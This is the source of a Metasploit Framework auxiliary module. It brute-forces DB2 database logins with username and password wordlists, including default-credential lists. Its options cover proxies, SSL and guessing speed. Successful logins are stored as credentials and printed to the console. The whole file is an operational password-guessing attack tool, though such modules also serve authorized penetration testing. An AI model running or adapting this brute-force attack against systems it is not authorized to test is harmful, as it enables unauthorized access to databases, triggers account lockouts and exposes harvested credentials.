Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/db2'

# Auxiliary scanner that tries username/password combinations against a DB2
# instance and reports the outcome of every attempt through the framework's
# credential-reporting helpers.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Declares the module metadata and registers the proxy and wordlist options.
  #
  # The three OptPath options are optional and default to the DB2 wordlists
  # under the framework data directory.
  def initialize
    super(
      'Name' => 'DB2 Authentication Brute Force Utility',
      'Description' => %q{
        This module attempts to authenticate against a DB2 instance
        using username and password combinations indicated by the
        USER_FILE, PASS_FILE, and USERPASS_FILE options.
      },
      'Author' => ['todb'],
      'References' => [
        [ 'CVE', '1999-0502'] # Weak password
      ],
      'License' => MSF_LICENSE,
      # Declared impact: every guess is a real authentication request, so the
      # attempts are expected to appear in the target's logs (IOC_IN_LOGS) and
      # repeated failures can trip an account-lockout policy (ACCOUNT_LOCKOUTS).
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
        'Reliability' => []
      }
    )

    # All default wordlists live in the same directory of the framework data dir.
    wordlist_dir = File.join(Msf::Config.data_directory, 'wordlists')

    register_options(
      [
        Opt::Proxies,
        OptPath.new('USERPASS_FILE', [
          false,
          'File containing (space-separated) users and passwords, one pair per line',
          File.join(wordlist_dir, 'db2_default_userpass.txt')
        ]),
        OptPath.new('USER_FILE', [
          false,
          'File containing users, one per line',
          File.join(wordlist_dir, 'db2_default_user.txt')
        ]),
        OptPath.new('PASS_FILE', [
          false,
          'File containing passwords, one per line',
          File.join(wordlist_dir, 'db2_default_pass.txt')
        ])
      ]
    )
  end

  # Runs the login scanner against a single host and records each result.
  #
  # @param ip [String] address of the host being scanned
  def run_host(ip)
    # The DATABASE option is passed as the credential realm.
    candidates = build_credential_collection(
      realm: datastore['DATABASE'],
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    scanner_options = configure_login_scanner(
      host: ip,
      port: rport,
      proxies: datastore['PROXIES'],
      cred_details: candidates,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      # Fixed value; not read from the datastore like the other settings.
      connection_timeout: 30,
      max_send_size: datastore['TCP::max_send_size'],
      send_delay: datastore['TCP::send_delay'],
      framework: framework,
      framework_module: self,
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion'],
      ssl_verify_mode: datastore['SSLVerifyMode'],
      ssl_cipher: datastore['SSLCipher'],
      local_port: datastore['CPORT'],
      local_host: datastore['CHOST']
    )
    login_scanner = Metasploit::Framework::LoginScanner::DB2.new(scanner_options)

    login_scanner.scan! do |attempt|
      # Tag the attempt with the originating module and the current workspace.
      record = attempt.to_h.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      if attempt.success?
        record[:core] = create_credential(record)
        create_credential_login(record)

        # NOTE(review): the credential is interpolated into console output and
        # presumably includes the password, so console logs and spool files
        # should be handled as sensitive. Confirm against Credential#to_s.
        print_good "#{ip}:#{rport} - Login Successful: #{attempt.credential}"
      else
        # Failed guesses are also reported, through invalidate_login.
        invalidate_login(record)
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{attempt.credential} (#{attempt.status}: #{attempt.proof})"
      end
    end
  end
end